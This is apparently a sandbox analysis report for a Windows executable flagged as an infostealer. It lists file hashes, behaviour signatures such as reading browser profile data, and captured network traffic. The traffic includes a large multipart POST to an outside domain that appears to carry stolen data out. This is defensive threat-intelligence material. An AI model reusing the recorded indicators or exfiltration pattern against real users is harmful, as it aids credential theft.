Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
134s -
max time network
33s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
07/07/2020, 06:24 UTC
General
-
Target
b1843967b94d29f088ec35143ad94e6e.exe
-
Size
412KB
-
MD5
b1843967b94d29f088ec35143ad94e6e
-
SHA1
013aa99862c45afe518018a4ca5d8b230f94d0da
-
SHA256
12d8decff8e6285f7bf32161258817d35ebf684c9db5acb26aa79dd6c6e96960
-
SHA512
1c3a083b48cc8329cee05aa3ac24aadee65e21626f965623fee8fc7779ecdaaeb7096cb7744712a3fccb4a1c9e6231c7b61fd0541e4eb4131a33d1cf14f09ad5
Score
7/10
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Checks for installed software on the system 1 TTPs 30 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b1843967b94d29f088ec35143ad94e6e.exe"C:\Users\Admin\AppData\Local\Temp\b1843967b94d29f088ec35143ad94e6e.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Checks for installed software on the system
Network
-
DNStikkirikki.spaceRemote address:8.8.8.8:53Requesttikkirikki.spaceIN AResponsetikkirikki.spaceIN A172.67.221.174tikkirikki.spaceIN A104.18.58.9tikkirikki.spaceIN A104.18.59.9 -
GEThttps://tikkirikki.space/api.phpRemote address:172.67.221.174:443RequestGET /api.php HTTP/1.1
Host: tikkirikki.space
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Tue, 07 Jul 2020 06:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dc2e4099f9c7df2b9c0f543d618d7d6b01594103071; expires=Thu, 06-Aug-20 06:24:31 GMT; path=/; domain=.tikkirikki.space; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000; preload
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 03c98b999d0000fa20ac050200000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 5aef7ba29ef5fa20-AMS
-
POSThttps://tikkirikki.space/index.phpRemote address:172.67.221.174:443RequestPOST /index.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accepts-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=-------------------------8d8224f1e77ddd0
Host: tikkirikki.space
Content-Length: 502972
Expect: 100-continue
ResponseHTTP/1.1 100 Continue
-
DNSRemote address:172.67.221.174:443ResponseHTTP/1.1 200 OK
Date: Tue, 07 Jul 2020 06:24:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da687390bc5d514460f5ad7c5d513680e1594103078; expires=Thu, 06-Aug-20 06:24:38 GMT; path=/; domain=.tikkirikki.space; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000; preload
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 03c98bb5cf0000fa20ac133200000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 5aef7bcfb9a3fa20-AMS
-
172.67.221.174:443https://tikkirikki.space/index.phptls, http
HTTP Request
GET https://tikkirikki.space/api.phpHTTP Response
200HTTP Request
POST https://tikkirikki.space/index.phpHTTP Response
100HTTP Response
200
-
10.7.0.255:137netbios-ns
-
224.0.0.252:5355
-
8.8.8.8:53tikkirikki.spacedns
DNS Request
tikkirikki.space
DNS Response
172.67.221.174104.18.58.9104.18.59.9
-
239.255.255.250:1900
-
239.255.255.250:1900